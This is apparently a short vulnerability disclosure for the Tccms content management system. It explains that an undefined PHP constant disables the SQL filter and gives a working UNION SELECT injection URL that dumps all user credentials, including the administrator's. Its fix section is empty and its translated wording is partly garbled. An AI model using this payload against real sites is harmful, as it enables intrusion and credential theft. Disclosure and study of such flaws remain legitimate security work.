Tccms SQL Injection #2

Tccms SQL Injection #2

The constant is not defined.

View/system/core/controller. class. php
 

private function forceAttack() {        $attack = M('attack');    if (Config::get("blackcheck") == 1 && !defined('IN_ADMIN') && $_GET['ac'] != 'common_newCode') {    $canBePass = $attack->checkForbidden();        if ($canBePass) {            $this->setValue("error", Config::lang("YOUAREPROHIBITED"));            $this->forward("error.html");            exit;        }}        if (Config::get("checkHack") &&　IN_ADMIN != TRUE) {            $attack->initLogHacker();        }    }

When Config: get ("checkHack") & IN_ADMIN! = TRUE: Call initLogHacker to filter SQL statements.

CheckHack is true by default. However, the IN_ADMIN constant is undefined. If an undefined constant is used in php, PHP assumes that it wants the name of the constant, just like calling it with a string (CONSTANT corresponds to "CONSTANT "). An E_NOTICE-level error will be reported at this time (refer to the http://php.net/manual/zh/language.constants.syntax.php)

In this case, IN_ADMIN = "IN_ADMIN" is true.

If (Config: get ("checkHack") & IN_ADMIN! = TRUE) the SQL filter function fails to be called because the logic is not TRUE.

After we register a user

Access

http://localhost/index.php?ac=news_all&yz=1%20union%20select%20group_concat%28username,0x23,password%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20from%20tc_user%23

 

All user information, including the Administrator, is exposed.

Solution:

Repair ~~